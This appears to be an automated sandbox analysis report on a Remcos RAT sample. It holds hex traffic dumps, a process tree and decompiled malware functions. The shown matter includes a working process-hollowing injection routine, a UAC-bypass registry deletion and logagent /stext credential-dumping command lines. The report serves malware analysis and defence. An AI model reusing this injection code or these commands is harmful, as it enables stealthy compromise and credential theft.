69 b2 a1 c7 c7
                                        Data Ascii: R7R95C#7:&q[V=nPAnM)fg;H4J0p85cV4c#`>RiO26tyB=0DQ^ke+5|eiJ"-;qg9a;KIu}:rfiTYmT9VelS5SzRlkH+@$ai
                                        2021-09-22 19:00:56 UTC1643INData Raw: 35 af 3d c9 a9 75 ce 11 b5 4a e5 b6 b8 95 65 cd eb 90 f9 88 17 6b cb ff af 07 d0 19 06 1c bc 2a 3b 50 fe 09 86 07 ac a6 d6 60 26 a3 34 c1 34 f1 52 03 97 28 f3 96 f9 8a 09 90 e3 cc 7f 80 37 2c d5 c2 96 f1 ac a2 c5 10 3a 9a b5 5c 18 c5 4f ec 27 4b 16 f4 17 6b ca 7b b9 34 a5 5d f8 0c 0c 18 e1 cf fa 38 9e bc ea 4f 7c 5a 14 3b 41 4a f1 de 34 c0 f3 e2 3d 55 89 f5 e7 89 a1 53 85 b3 0e 26 a3 75 96 a3 34 80 3e fb f4 25 78 4a f1 9e 92 1e 91 4c cd fb f4 24 a0 85 f2 20 ab 71 c6 40 e5 f4 64 6b e0 d5 a1 6f fc 56 0b a9 71 de 34 c1 75 c3 79 99 2f 40 db ae cc 0d ec 53 85 f2 60 21 18 84 70 05 ea df b7 1e a0 c9 86 74 4d 78 56 4a c1 90 8a 3c e2 69 b5 1b 86 74 4d 78 56 0b e8 4a f9 ef 98 ab 9c e2 3d 55 89 fb f4 64 ea 4f 7c 5e 1d 0f f0 5c 18 84 70 44 e5 c4 bd 5c d5 a1 6e 70 87
                                        Data Ascii: 5=uJek*;P`&44R(7,:\O'Kk{4]8O|Z;AJ4=US&u4>%xJL$ q@dkoVq4uy/@S`!ptMxVJ<itMxVJ=UdO|^\pD\np
                                        2021-09-22 19:00:56 UTC1659INData Raw: cf 7c 5e 5d 68 bf c9 86 34 2d c2 4d 2d 32 f8 5a a8 1d 56 f4 9b dd fd 10 73 8b 0c ee ef d9 e9 20 65 16 d5 a1 6a 00 e8 e9 95 ea b0 2f 53 6d be ae 3f 25 98 9b 62 ca f9 55 dc 30 fd cf 20 36 9c 5b 69 4a 8a 95 15 bd 9f 5f 27 25 60 cd 6b 03 83 ee 12 40 6b 1a d1 67 4f 83 7f 0d ec 13 0a 09 5b 96 d7 49 8b 45 33 3f 1c ba 4a 52 5a eb 2e 4b d4 f7 eb 91 ff a4 0e 6e 00 bc 5e a7 69 49 2a 22 65 53 fe 84 98 9b 62 d5 e9 a4 e7 24 15 a8 2e 77 8e df ec 0d 10 36 4e 06 00 d9 aa b6 dd 4e 87 75 33 7a d3 63 57 f2 49 87 a6 46 a8 35 4b 36 4e ac de 40 db 52 7b 5f 97 5c 93 ed 88 f0 ac 4c 2c 3b 06 0e 3f b5 d0 43 a2 3a ce 54 40 d3 b9 9b e2 b6 dd f7 ac cb ae 33 ff 77 d3 d9 ee 47 4e 05 1b 80 67 f5 a0 b9 41 a1 bf 71 d6 e1 e6 1f 48 2e 3f a9 aa 3c 2c e2 02 bd af b1 ad 10 7e 8b 03 93 9c a4 f6
                                        Data Ascii: |^]h4-M-2ZVs ej/Sm?%bU0 6[iJ_'%`k@kgO[IE3?JRZ.Kn^iI*"eSb$.w6NNu3zcWIF5K6N@R{_\L,;?C:T@3wGNgAqH.?<,~
                                        2021-09-22 19:00:56 UTC1675INData Raw: 2c c4 34 3f 43 16 c4 d0 c9 a2 4e c4 b8 6b 90 61 a3 34 c1 74 f2 bb 5b 66 a5 6f 94 c0 63 6b e2 63 f7 b1 91 87 f7 58 17 fd fc 03 f2 64 10 8c 87 b2 5e 1a 03 d9 d5 a6 81 16 7f 7e 6c d3 5a 9f d4 e0 c7 24 76 97 92 59 19 dd 81 19 8d f9 64 0e 62 ae 9d 71 90 d9 a9 01 5f 5c 45 3f 00 0b b6 82 a8 35 b3 bd 93 ee c6 b2 3d 96 68 cc 95 95 fd 00 15 70 44 a4 07 a3 5c 08 e8 2e ed 8c db 6e 73 ca ba e0 38 35 bc 71 9f c3 be 65 a7 49 af cb 74 b2 03 ae 24 59 19 fe 2f bd 93 ee ca c7 6a cb ce 9a b6 56 c3 f2 9f d4 84 0a 8d c4 77 83 16 c5 f3 1d f0 a3 21 f0 a0 e8 c1 a3 bf 4b 07 20 10 a8 8d 23 95 71 f6 96 f3 e2 7d 50 8b 97 4c 36 f6 95 50 77 21 93 e8 c1 8d 5e 94 48 de 63 fe 29 d1 5c 9b ce 9a f5 e7 88 f4 64 2e 76 0c 8f 83 b5 05 84 87 b3 dc 31 cc 48 2b 1d 86 12 8f 4d f3 fa f8 91 49 e4 43
                                        Data Ascii: ,4?CNka4t[fockcXd^~lZ$vYdbq_\E?5=hpD\.ns85qeIt$Y/jVw!K #q}PL6Pw!^Hc)\d.v1H+MIC
                                        2021-09-22 19:00:56 UTC1691INData Raw: a3 bf 71 83 a8 de 11 0a a5 b3 56 4e bc 8e a3 cb 4b f8 6d fb b2 bc cf 6b 79 53 85 b7 19 6a 12 88 b9 ef d9 ec 15 8d 26 5c d8 ac c7 c7 c4 88 5c e7 08 ea 4f 39 0a 1d 2a 54 c7 09 e3 fa 37 34 e4 be 2e 3f 59 d7 e3 3f 7c a1 ef 52 03 93 57 0a 40 24 5e 96 97 5c 5e 95 30 47 ab ce 11 b0 96 1b 2e 4b b3 dd b2 91 4a 61 86 8b 3f d2 1a cd c9 12 52 fc b6 56 0b ad 0f 68 16 7f 25 ab 45 23 5a 88 5c e7 08 ea 4f 39 0a c5 5b 69 75 44 e4 04 1e 35 66 d1 58 9b 22 df f1 76 74 b2 14 f0 5c 5d dd 1e b4 26 63 23 1c c8 42 50 db 51 40 50 fe 3f 1f a7 19 f9 2f bd 6c 7e 25 98 be 11 35 c8 04 1d 49 d3 b9 9b e2 b6 dd f7 ad 89 de cb 4b f8 6d fb b2 10 56 f4 a4 3d 55 cc 4b bb 4d 87 36 4e fa 34 87 3a eb 2e 74 c6 00 15 bb b8 c4 03 16 0b e8 0f b6 35 66 d1 58 9b 22 df f1 3e f2 9f eb 5a 14 3e 91 d8 02
                                        Data Ascii: qVNKmkySj&\\O9*T74.?Y?|RW@$^\^0G.KJa?RVh%E#Z\O9[iuD5fX"vt\]&c#BPQ@P?/l~%5IKmV=UKM6N4:.t5fX">Z>
                                        2021-09-22 19:00:56 UTC1707INData Raw: db ae cc 11 2c 58 d6 a8 ee 57 8e 9c 45 8e 40 50 fe 3a e1 5f 87 b5 9c a4 b6 dd 32 b5 18 43 64 69 3c b5 5b d3 8c b9 c4 3c e0 ee e7 cc 4e 3d 33 2b 6e c9 86 74 4c ba 65 21 18 84 73 db 46 e8 4a f0 10 c9 4f 4f bf fa a9 ca fb 7f b3 05 18 59 79 27 da cc f2 88 ae 7c 5a 52 c4 9a 4a 1a 88 79 d8 4e 42 37 f8 69 f3 25 46 17 fd 18 fb 1c bb 97 da 72 89 ca 09 a3 1b 73 eb 97 de 33 4a f3 1a 0b f8 19 c6 85 0d 13 19 ac 2f 00 af 59 e6 91 bd 68 4d f9 89 fd 71 ff 88 86 8c 02 ab ba 06 8d eb 24 f4 66 c5 8a 17 06 28 a7 79 eb 31 c5 ff f2 8b 09 89 ff 88 ae 7e 67 ce 90 ec 47 2d bb 68 73 e4 35 67 f6 ae cc 0d ec d3 94 d5 66 2e b4 d8 6b 3f d4 22 71 b0 a5 70 bb 97 f8 46 00 66 d1 98 9b 22 1a 0c 65 ec ac 38 2b 6c d3 aa 3c 83 3e fe 7a 30 ba 8c 6e ab 05 d8 53 8b ff fc 77 9f 2d 8e 06 36 b6 0d
                                        Data Ascii: ,XWE@P:_2Cdi<[<N=3+ntLe!sFJOOYy'|ZRJyNB7i%Frs3J/YhMq$f(y1~gG-hs5gf.k?"qpFf"e8+l<>z0nSw-6


                                        Code Manipulations

                                        Statistics

                                        CPU Usage


                                        Memory Usage


                                        High Level Behavior Distribution


                                        Behavior


                                        System Behavior

                                        General

                                        Start time:20:59:16
                                        Start date:22/09/2021
                                        Path:C:\Users\user\Desktop\g4E1F7Lc2O.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\g4E1F7Lc2O.exe'
                                        Imagebase:0x400000
                                        File size:1017856 bytes
                                        MD5 hash:7274D6C1A7DC0A091E1A801165F879CD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Reputation:low

                                        General

                                        Start time:20:59:46
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\logagent.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\logagent.exe
                                        Imagebase:0x9c0000
                                        File size:86016 bytes
                                        MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.829624979.0000000003138000.00000004.00000020.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, Author: unknown
                                        Reputation:moderate

                                        General

                                        Start time:20:59:55
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:20:59:55
                                        Start date:22/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:20:59:56
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:20:59:57
                                        Start date:22/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:20:59:57
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:20:59:57
                                        Start date:22/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:20:59:58
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:reg delete hkcu\Environment /v windir /f
                                        Imagebase:0x3d0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:20:59:58
                                        Start date:22/09/2021
                                        Path:C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe'
                                        Imagebase:0x400000
                                        File size:1017856 bytes
                                        MD5 hash:7274D6C1A7DC0A091E1A801165F879CD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 20%, ReversingLabs

                                        General

                                        Start time:20:59:58
                                        Start date:22/09/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:21:00:00
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\logagent.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\igawhodvxqh'
                                        Imagebase:0x9c0000
                                        File size:86016 bytes
                                        MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:21:00:00
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\logagent.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\tifoigoxkyzdtxn'
                                        Imagebase:0x9c0000
                                        File size:86016 bytes
                                        MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:21:00:01
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\logagent.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\vdtziqzqygridlbaiz'
                                        Imagebase:0x9c0000
                                        File size:86016 bytes
                                        MD5 hash:E2036AC444AB4AD91EECC1A80FF7212F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:21:00:06
                                        Start date:22/09/2021
                                        Path:C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exe'
                                        Imagebase:0x400000
                                        File size:1017856 bytes
                                        MD5 hash:7274D6C1A7DC0A091E1A801165F879CD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Borland Delphi

                                        General

                                        Start time:21:00:34
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs'
                                        Imagebase:0x1360000
                                        File size:147456 bytes
                                        MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:21:01:00
                                        Start date:22/09/2021
                                        Path:C:\Windows\SysWOW64\DpiScaling.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\DpiScaling.exe
                                        Imagebase:0xdd0000
                                        File size:77312 bytes
                                        MD5 hash:302B1BBDBF4D96BEE99C6B45680CEB5E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, Author: unknown
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.928991151.0000000003627000.00000004.00000020.sdmp, Author: Joe Security

                                        Disassembly

                                        Code Analysis


                                          Executed Functions

                                          Non-executed Functions

                                          Memory Dump Source
                                          • Source File: 00000000.00000003.662883916.00000000031B4000.00000004.00000001.sdmp, Offset: 031B4000, based on PE: false
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.662883916.00000000031B4000.00000004.00000001.sdmp, Offset: 031B4000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: l.@$p.@$p.@$3C
                                          • API String ID: 0-542283486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 100%
                                          			E0040CD09() {
                                          				struct HINSTANCE__* _t1;
                                          				_Unknown_base(*)()* _t2;
                                          				_Unknown_base(*)()* _t24;
                                          
                                          				_t1 = LoadLibraryA("Psapi.dll"); // executed
                                          				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                                          				 *0x46bd2c = _t2;
                                          				if(_t2 == 0) {
                                          					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                          				}
                                          				 *0x46bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                                          				if( *0x46bd2c == 0) {
                                          					 *0x46bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                          				}
                                          				 *0x46bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
                                          				 *0x46bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                          				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                          				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
                                          				 *0x46bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
                                          				 *0x46bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                                          				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
                                          				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                                          				 *0x46bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                                          				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
                                          				 *0x46bb04 = _t24;
                                          				return _t24;
                                          			}







                                          APIs
                                          • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Octopus-GM39UT,00000001,0040C505), ref: 0040CD1C
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD25
                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD40
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD43
                                          • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD54
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD57
                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CD71
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD74
                                          • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CD85
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD88
                                          • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CD99
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CD9C
                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDAD
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CDB0
                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CDC1
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CDC4
                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CDD5
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CDD8
                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CDE9
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CDEC
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CDFD
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CE00
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE11
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CE14
                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE25
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CE28
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE36
                                          • GetProcAddress.KERNEL32(00000000), ref: 0040CE39
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleModule$LibraryLoad
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Octopus-GM39UT$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                                          • API String ID: 551388010-1666371535
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E0041412B(WCHAR* __ecx, char __edx, struct _PROCESS_INFORMATION* _a4) {
                                          				void _v8;
                                          				signed int _v12;
                                          				char _v16;
                                          				CONTEXT* _v20;
                                          				WCHAR* _v24;
                                          				struct _STARTUPINFOW _v92;
                                          				void* __edi;
                                          				int _t57;
                                          				void* _t58;
                                          				CONTEXT* _t62;
                                          				int _t63;
                                          				int _t71;
                                          				void* _t72;
                                          				void* _t73;
                                          				int _t74;
                                          				int _t79;
                                          				long _t80;
                                          				int _t83;
                                          				intOrPtr* _t95;
                                          				void* _t98;
                                          				signed int _t102;
                                          				intOrPtr _t104;
                                          				void* _t106;
                                          				CONTEXT* _t110;
                                          				void* _t113;
                                          				CONTEXT* _t114;
                                          				struct _PROCESS_INFORMATION* _t116;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_v16 = __edx;
                                          				_v24 = __ecx;
                                          				if( *((intOrPtr*)(__edx)) == 0x5a4d) {
                                          					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
                                          					if( *_t95 == 0x4550) {
                                          						_push(_t106);
                                          						L00431F00(_t106,  &_v92, 0, 0x44);
                                          						_t116 = _a4;
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						asm("stosd");
                                          						_t57 = CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116); // executed
                                          						if(_t57 == 0) {
                                          							L21:
                                          							_t58 = 0;
                                          							L22:
                                          							L23:
                                          							return _t58;
                                          						}
                                          						FindCloseChangeNotification(_v92.hStdInput); // executed
                                          						FindCloseChangeNotification(_v92.hStdOutput); // executed
                                          						CloseHandle(_v92.hStdError);
                                          						_t62 = VirtualAlloc(0, 4, 0x1000, 4); // executed
                                          						_t110 = _t62;
                                          						_v20 = _t110;
                                          						_t110->ContextFlags = 0x10007;
                                          						_t63 = GetThreadContext(_t116->hThread, _t110); // executed
                                          						if(_t63 == 0) {
                                          							L20:
                                          							TerminateProcess(_t116->hProcess, 0); // executed
                                          							CloseHandle(_t116->hProcess);
                                          							CloseHandle(_t116->hThread);
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							goto L21;
                                          						}
                                          						_t71 = ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0); // executed
                                          						if(_t71 == 0) {
                                          							goto L20;
                                          						}
                                          						_t72 = _v8;
                                          						if(_t72 ==  *(_t95 + 0x34)) {
                                          							NtUnmapViewOfSection(_t116->hProcess, _t72);
                                          						}
                                          						_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40); // executed
                                          						_v24 = _t73;
                                          						if(_t73 == 0) {
                                          							goto L20;
                                          						} else {
                                          							_t22 =  &_v16; // 0x41433b
                                          							_t113 =  *_t22;
                                          							_t74 = WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0); // executed
                                          							if(_t74 == 0) {
                                          								goto L20;
                                          							}
                                          							_v12 = _v12 & 0x00000000;
                                          							if(0 >=  *(_t95 + 6)) {
                                          								L14:
                                          								_t98 = _t95 + 0x34;
                                          								_t114 = _v20;
                                          								if(_v8 ==  *_t98) {
                                          									L17:
                                          									_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
                                          									_t79 = SetThreadContext(_t116->hThread, _t114); // executed
                                          									if(_t79 == 0) {
                                          										goto L20;
                                          									}
                                          									_t80 = ResumeThread(_t116->hThread); // executed
                                          									if(_t80 == 0xffffffff) {
                                          										goto L20;
                                          									}
                                          									_t58 = 1;
                                          									goto L22;
                                          								}
                                          								_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0); // executed
                                          								if(_t83 != 0) {
                                          									goto L17;
                                          								}
                                          								TerminateProcess(_t116->hProcess, _t83);
                                          								goto L21;
                                          							}
                                          							_t104 = 0;
                                          							_v16 = 0;
                                          							do {
                                          								WriteProcessMemory( *_t116,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x10c)) + _t113,  *( *((intOrPtr*)(_t113 + 0x3c)) + _t104 + _t113 + 0x108), 0); // executed
                                          								_t37 =  &_v16; // 0x41433b
                                          								_t102 = _v12 + 1;
                                          								_t104 =  *_t37 + 0x28;
                                          								_v12 = _t102;
                                          								_v16 = _t104;
                                          							} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
                                          							goto L14;
                                          						}
                                          					}
                                          					_t58 = 0;
                                          					goto L23;
                                          				}
                                          				return 0;
                                          			}


                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ;CA
                                          • API String ID: 0-233881251
                                          • Opcode ID: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                                          • Instruction ID: bd197fad053dbfc90d5835daa1a59b9970fe7a36a364e2f4af16486f2ac585b0
                                          • Opcode Fuzzy Hash: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                                          • Instruction Fuzzy Hash: 09518D70600604BFEB108FA5CC45FAABBB9FF84742F144065FA54E62A1C775D990DB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLocalTime.KERNEL32(00000001,0046C238,0046C780,00000000,?,?,?,?,?,?,?,?,?,?,?,004125B1), ref: 00404ED2
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C238,0046C780,00000000), ref: 00404F85
                                          • CreateThread.KERNELBASE(00000000,00000000,0040518A,?,00000000,00000000), ref: 00404F98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Create$EventLocalThreadTime
                                          • String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
                                          • API String ID: 2532271599-119634454
                                          • Opcode ID: dc77e667257af7b5de05517ff536dae1ad9cd995fdb6c6a3c9126bbe164289b7
